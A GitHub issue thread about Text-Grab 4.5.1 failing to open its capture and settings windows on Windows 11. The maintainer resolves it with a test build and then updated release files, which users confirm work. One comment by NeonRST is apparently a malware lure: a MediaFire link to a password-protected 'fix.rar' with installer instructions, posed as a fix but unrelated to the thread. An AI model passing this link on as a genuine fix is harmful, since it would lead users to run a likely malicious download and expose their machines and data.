### ISSUE TITLE
Version 4.51 just doesn't work for me

### ISSUE THREAD

**Issue by Galthariel** [TheJoeFin/Text-Grab#486]
**Describe the bug**
Clicking the icon in the Systray doesn't bring the capture window as it should

**Where is the bug**
Right-clicking the icon in the Systray shows all the options but only close or settings works and when I click on settings  it freezes

**To Reproduce**
Download the latest Text-Grab-Self-Contained-4.5.1-2024-08-25 as I did with the previous versions and unzipped in the previous folder

**Expected behavior**
Clicking the icon in the Systray doesn't bring the capture window as it should

**Screenshots**

**Where did you get Text Grab?**
- GitHub releases
    - Exe
    - Self-contained

**Desktop (please complete the following information):**
 - OS: Windows 11
 - Version [e.g. 2024, 23H2]
 - Text Grab Version [e.g. 4.5.1]

**Additional context**
Rolled back to the previous version, and it's working as usual

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mauriva** [comment]
I report the same problem.
I have been using the app for some time in the “Self-Contained” version in Windows 11 23H2.
Yesterday, as I have done other times in the past, I closed the program (I was on 4.4.2), overwritten the files in the folder with the new ones (4.5.1), and restarted the program.
Apparently the software is running, but by clicking on the icon in the systray the top bar appears, but without the ability to select the language.
If I select an area for text recognition, the notification appears with the text actually recognized (and copied to the clipboard), but clicking on the notification does not bring up the editing window as usual.
Clicking on Settings (in the top bar, or from systray) opens the window, but it remains blank and the program crashes.
Can this be a problem in the update? How do I delete the configuration files for a clean installation? It seems to me that they are not in the folder that contains the program.
Thank you for your attention.

**Comment by yuukiAme** [comment]
Same. It doesn't open the windows or prompt anything after I deleted the previous version and using the latest version.

**Comment by TheJoeFin** [comment]
Test this build from the GitHub Action and see if it works:
https://github.com/TheJoeFin/Text-Grab/actions/runs/10550900309

**Comment by mauriva** [comment]
> Test this build from the GitHub Action and see if it works: https://github.com/TheJoeFin/Text-Grab/actions/runs/10550900309

I only did a short test, but it seems to me that this version is okay.

**Comment by Galthariel** [comment]
> Test this build from the GitHub Action and see if it works: https://github.com/TheJoeFin/Text-Grab/actions/runs/10550900309

Thanks Joe,

That version works fine

**Comment by TheJoeFin** [comment]
@Galthariel the version is in the Settings:
![image](https://github.com/user-attachments/assets/4dd27961-711b-4c19-9203-7bcc7aedc3a6)

**Comment by TheJoeFin** [comment]
@mauriva @yuukiAme @Galthariel I updated the builds in the release, could you please test and see if the issue is resolved

**Comment by yuukiAme** [comment]
@TheJoeFin Yes, it works now. I extracted and open .exe and the program opens with no issues.

**Comment by TheJoeFin** [comment]
Great! Thanks for testing!

**Comment by mauriva** [comment]
I can confirm that the latest version in release works as expected.
Thank you!
